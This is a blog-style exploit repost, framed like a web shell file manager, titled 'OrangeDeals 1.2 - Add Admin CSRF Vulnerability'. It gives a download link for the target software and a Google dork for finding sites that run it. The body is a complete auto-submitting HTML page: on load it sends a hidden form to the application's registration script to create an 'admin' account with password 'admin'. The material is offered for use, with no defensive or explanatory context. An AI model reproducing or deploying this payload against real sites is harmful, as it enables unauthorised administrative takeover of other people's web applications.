xDay Exploit
v10
today : | at : | safemode : ON
> / home / facebook / twitter / exit /
name author perms com modified label

OrangeDeals 1.2 - Add Admin CSRF Vulnerability Unknown rwxr-xr-x 0 8:24 AM

Filename OrangeDeals 1.2 - Add Admin CSRF Vulnerability
Permission rw-r--r--
Author Unknown
Date and Time 8:24 AM
Label
Action
####################################################################
.:. software : http://softlayer-ams.dl.sourceforge.net/project/orangedeals/orangedeals_v1.2.zip
.:. Google Dork : Powered by OrangeDeals 1.2
####################################################################

===[ Exploit ]===


[Add Admin]

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>exploit csrf</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "1115" );

function pausecomp(millis)
{
var date = new Date();
var curDate = null;

do { curDate = new Date(); }
while(curDate-date < millis);
}

function fireForms()
{
var count = 1;
var i=0;

for(i=0; i<count; i++)
{
document.forms[i].submit();

pausecomp(pauses[i]);
}
}

</script>
<H2>Exploit</H2>
<form method="POST" name="form0" action="http://localhost:80/hack/orangedeals_v1.2/http/register_.php">
<input type="hidden" name="name" value="admin"/>
<input type="hidden" name="pass" value="admin"/>
<input type="hidden" name="pass_" value="admin"/>
<input type="hidden" name="email" value="admin@admin.com"/>
<input type="hidden" name="email2" value="admin@admin.com"/>
<input type="hidden" name="city" value="0"/>
<input type="hidden" name="city1" value="1"/>
<input type="hidden" name="city2" value="2"/>
<input type="hidden" name="code_" value="8924"/>
<input type="hidden" name="code" value="8924"/>
<input type="hidden" name="terms_of_use" value="1"/>
<input type="hidden" name="reg" value="Submit"/>
</form>

</body>
</html>

0 comments:

Post a Comment

 

xDay Exploit By : Anass Ibn El Farouk